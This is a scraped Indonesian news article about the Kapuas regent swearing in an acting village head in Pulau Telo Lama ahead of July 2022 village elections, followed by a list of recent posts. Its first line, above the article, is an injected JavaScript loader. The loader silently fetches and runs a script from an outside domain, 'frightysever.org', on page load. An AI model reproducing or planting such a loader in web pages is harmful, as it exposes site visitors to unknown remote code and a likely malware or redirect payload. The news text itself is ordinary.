(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Bupati Kapuas Melantik Pj Kades Pulau Telo Lama


KANALKALIMANTAN.COM, KUALA KAPUAS – Bupati Kapuas Ir Ben Brahim S Bahat melantik Penjabat (Pj) Kepala Desa Pulau Telo Lama, Kecamatan Selat, Jumat (24/6/2022).

Kedatangan Bupati Kapuas Ir Ben Brahim S Bahat didampingi Ketua TP PKK Kabupaten Kapuas Ary Egahny Ben Bahat disambut hangat dan penuh kekeluargaan warga Desa Pulau Telo Lama.

Penjabat Kepala Desa yang dilantik sesuai dengan Surat Keputusan Bupati Kapuas, sebelumnya yang menjabat sebagai Pj Kades Tagap dan digantikan oleh Pj Kades Kardiansyah.

Camat Selat, Yaya Setiabudi SSos, pelantikan penjabat kepala desa ini yaitu sesuai Peraturan Bupati Kapuas, apabila terjadi kekosongan jabatan kepala desa sementara pemilihan kepala desa secara serentak bulan depan dilaksanakan, maka diangkatlah Penjabat Kepala Desa dari ASN yang dianggap mampu memahami teknis pemerintahan.

 

 

Baca juga: Launching “Dashat” Kampung KB di Desa Baruh Tabing

“Dengan dilaksanakannya pelantikan ini diharapkan kegiatan pemerintahan, pembangunanNdi desa dapat berjalan dengan baik,” kata Yaya Setibudi.

Sementara itu, Bupati Kapuas Ir Ben Brahim S Bahat atas nama pribadi dan Pemerintah Kabupaten Kapuas menyampaikan selamat kepada penjabat kepala desa yang dilantik. Ia mengatakan, sambil menunggu Pilkades serentak Juli nanti, dan sudah ada pejabat definitif, tugas Pj Kades yang dilantik yaitu mempersiapkan Pilkades yang akan dilaksanakan pada Juli mendatang.

“Saya berharap Juli 2022 mendatang pemilihan kepala desa di Kabupaten Kapuas sudah tuntas semua,” kata Ben Brahim.

Terkait dengan itu, Ben Brahim menuturkan, terpenting pada saat pemilihan siapapun yang terpilih, masyarakat harus mendukung dan ia berharap Pilkades ke depan kondusif, rukun, dan damai.

Ben Brahim mengaku datang langsung melantik Pj Kades di Desa Pulau Telo Lama ini, karena ingin mengetahui secara langsung kondisi desa. Seperti untuk prasarana jalan, ia mengatakan sudah bagus, namun masih ada sekolah TK kondisi tidak nyaman dilihat. “Ini harus menjadi perhatian Dinas Pendidikan Kapuas dan menjadi perhatian Kades terpilih nantinya, agar segera dibongkar dan dibangun yang lebih bagus,” kata Bupati Kapuas.

Baca juga: Menjaga Kitab-kitab dan Naskah Kuno Warisan Datu Kelampayan Berusia 2 Abad

Bupati Kapuas dua periode ini mengingatkan waktu pemilihan kades tinggal menghitung hari, jadi persiapan harus matang.

“Saya ingatkan juga kepala kepala OPD ataupun ASN lingkup Pemkab Kapuas, jangan bermain politik, dan jangan pengaruhi orang lain, kalau saya tahu, akan saya mutasi. Maka biarlah masyarakat memilih pemimpinnya. Sekali lagi saya ingatkan jika ingin berpolitik berhenti menjadi kepala OPD, dan ini belaku kepada ASN lainnya,” tegasnya.

“Selamat bekerja bagi Pj Kades yang baru dilantik dalam menggerakan kembali roda pemerintahan desa, pembangunan desa dan pembinaan kemasyarakatan,” pungkasnya. (Kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Risa

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

13 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

14 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

14 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

18 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

20 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

20 jam ago

This website uses cookies.